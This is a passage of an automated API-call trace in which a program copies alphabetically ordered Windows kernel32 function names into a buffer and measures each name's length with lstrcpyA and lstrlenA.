returned="BuildCommDCBAndTimeoutsW" [0078.096] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.096] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.096] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.096] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.096] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.096] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.096] lstrlenA (lpString="CANCELIO") returned 8 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.096] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.096] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.096] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.096] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.096] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.096] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.096] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.096] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.096] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.096] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.096] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.096] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.097] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.097] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.097] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.097] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.097] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.097] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.097] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.097] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.097] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.097] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.097] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.097] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.097] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.097] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.097] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.097] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.097] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.097] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.097] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.097] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.098] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.098] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.098] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.098] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.098] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.098] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.098] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.098] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.098] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.098] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.098] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.098] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.098] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.098] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.098] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.098] lstrlenA (lpString="COPYFILEA") returned 9 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.098] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.098] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.098] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.099] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.099] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.099] lstrlenA (lpString="COPYFILEW") returned 9 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.099] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.099] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.099] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.099] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.099] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.099] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.099] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.099] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.099] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.099] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.099] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.099] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.099] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.099] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.099] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.099] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.099] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.100] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.100] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.100] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.100] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.100] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.100] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.100] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.100] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.100] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.100] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.100] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.100] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.100] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.100] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.100] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.100] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.100] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.100] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.100] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.100] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.101] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.101] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.101] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.101] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.101] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.101] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0078.101] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0078.101] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0078.101] lstrlenA (lpString="CREATEPIPE") returned 10 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0078.101] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0078.101] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0078.101] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0078.101] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0078.101] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0078.101] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0078.101] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0078.101] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0078.101] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0078.101] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0078.102] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0078.102] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.102] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.102] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.102] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.102] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.102] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.102] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.102] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.102] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.102] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.102] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.102] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.102] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.102] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.102] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.102] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.102] lstrcpyA (in: lpString1=0x3f2ccf4, 